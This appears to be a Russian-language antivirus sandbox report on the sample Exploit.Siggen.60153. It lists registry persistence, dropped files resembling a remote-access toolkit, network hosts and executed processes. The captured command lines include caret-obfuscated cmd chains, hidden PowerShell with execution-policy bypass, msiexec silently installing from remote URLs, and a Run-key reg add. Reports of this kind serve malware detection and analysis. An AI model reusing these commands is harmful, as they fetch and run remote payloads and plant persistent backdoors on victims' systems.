Exploit.Siggen.60153

Для обеспечения автозапуска и распространения

Модифицирует следующие ключи реестра

[<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'fonthost' = '%APPDATA%\3W7crCv9\fonthost.exe'

Вредоносные функции

Запускает на исполнение (эксплоит)

'<SYSTEM32>\cmd.exe' /c ping 1 -n 5&cd %temp%&copy summary.csv up^DATE1.bat&up^DATE1.bat&up^DATE.bat ^/^^q^^/^i^

Изменения в файловой системе

Создает следующие файлы

%TEMP%\summary.csv
%APPDATA%\3w7crcv9\directx.dll
%APPDATA%\3w7crcv9\remcmdstub.exe
%APPDATA%\3w7crcv9\pcicl32.dll
%APPDATA%\3w7crcv9\pcichek.dll
%APPDATA%\3w7crcv9\pcicapi.dll
%APPDATA%\3w7crcv9\nsm.lic
%APPDATA%\3w7crcv9\nsm.ini
%APPDATA%\3w7crcv9\nskbfltr.inf
%APPDATA%\3w7crcv9\msvcr100.dll
%APPDATA%\3w7crcv9\htctl32.dll
%APPDATA%\3w7crcv9\client32.ini
%APPDATA%\3w7crcv9\fonthost.exe
%APPDATA%\zgujhllilx.vbs
%TEMP%\nsec1eb.tmp\system.dll
%TEMP%\openfzgujhllilx.ps1
%TEMP%\nsec1eb.tmp\blowfish.dll
%TEMP%\mw-c91dbd9f-1bb8-4e90-9ba9-7dff6be71e50\files\$dpx$.tmp\c4fcd10a67cafa42ac84a8ddc8ad41c3.tmp
%TEMP%\mw-c91dbd9f-1bb8-4e90-9ba9-7dff6be71e50\files.cab
%TEMP%\mw-c91dbd9f-1bb8-4e90-9ba9-7dff6be71e50\msiwrapper.ini
%TEMP%\update.bat
%TEMP%\update1.bat
%WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
%WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357

Удаляет следующие файлы

Перемещает следующие файлы

%TEMP%\mw-c91dbd9f-1bb8-4e90-9ba9-7dff6be71e50\files\$dpx$.tmp\c4fcd10a67cafa42ac84a8ddc8ad41c3.tmp в %TEMP%\mw-c91dbd9f-1bb8-4e90-9ba9-7dff6be71e50\files\signed_gate6.exe

Сетевая активность

Подключается к

TCP

Запросы HTTP GET

'sa###f7774.pw':443

UDP

Другое

Ищет следующие окна

Создает и запускает на исполнение

'%TEMP%\mw-c91dbd9f-1bb8-4e90-9ba9-7dff6be71e50\files\signed_gate6.exe'
'%WINDIR%\syswow64\wscript.exe' %APPDATA%\ZGUJHLLILX.vbs
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -ep bypass -f %TEMP%\openfZGUJHLLILX.ps1
'%APPDATA%\3w7crcv9\fonthost.exe'
'<SYSTEM32>\cmd.exe' /c ping 1 -n 5&cd %temp%&copy summary.csv up^DATE1.bat&up^DATE1.bat&up^DATE.bat ^/^^q^^/^i^' (со скрытым окном)
'%WINDIR%\syswow64\expand.exe' -R files.cab -F:* files' (со скрытым окном)
'<SYSTEM32>\cmd.exe' /c ec^h^o CreateObject("Wscript.Shell").Run "cmd /c cmd /c cmd /c powershell -ep bypass -f %TEMP%\openfZGUJHLLILX.ps1", 0, False > %appdata%\ZGUJHLLILX.vb^s& wscript %appdata%\ZGUJHLLILX.vb^s& ...' (со скрытым окном)
'%WINDIR%\syswow64\cmd.exe' /c cmd /c cmd /c powershell -ep bypass -f %TEMP%\openfZGUJHLLILX.ps1' (со скрытым окном)

Запускает на исполнение

'<SYSTEM32>\ping.exe' 1 -n 5
'%WINDIR%\syswow64\reg.exe' add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v fonthost /t REG_SZ /d %APPDATA%\3W7crCv9\fonthost.exe /f
'%WINDIR%\syswow64\msiexec.exe' /i http://sa###f7774.pw/iplog/newg.php?hs####################### /q
'%WINDIR%\syswow64\cmd.exe' /c rd /s /q "%TEMP%\MW-c91dbd9f-1bb8-4e90-9ba9-7dff6be71e50\files"
'%WINDIR%\syswow64\cmd.exe' /c powershell -ep bypass -f %TEMP%\openfZGUJHLLILX.ps1
'%WINDIR%\syswow64\cmd.exe' /c cmd /c powershell -ep bypass -f %TEMP%\openfZGUJHLLILX.ps1
'%WINDIR%\syswow64\cmd.exe' /c cmd /c cmd /c powershell -ep bypass -f %TEMP%\openfZGUJHLLILX.ps1
'%WINDIR%\syswow64\msiexec.exe' /i http://sa###f7774.pw/iplog/newg.php?hs###################### /q
'<SYSTEM32>\cmd.exe' /c ec^h^o CreateObject("Wscript.Shell").Run "cmd /c cmd /c cmd /c powershell -ep bypass -f %TEMP%\openfZGUJHLLILX.ps1", 0, False > %appdata%\ZGUJHLLILX.vb^s& wscript %appdata%\ZGUJHLLILX.vb^s& ...
'<SYSTEM32>\msiexec.exe' /q/iHTTP://www.gi###hoir.org/webid.php
'<SYSTEM32>\cmd.exe' /S /D /c" set/P="HTTP^://^www.gi###hoir.org/webid.php" 1>>%TEMP%\update.bat"
'<SYSTEM32>\cmd.exe' /S /D /c" set/P="^xec%1" 1>>%TEMP%\update.bat"
'<SYSTEM32>\cmd.exe' /S /D /c" echo"
'<SYSTEM32>\cmd.exe' /S /D /c" set/p="msie" 1>%TEMP%\update.bat"
'<SYSTEM32>\cmd.exe' /C echo
'%WINDIR%\syswow64\expand.exe' -R files.cab -F:* files
'%WINDIR%\syswow64\rundll32.exe' %APPDATA%\3W7crCv9\directx.DLL, seed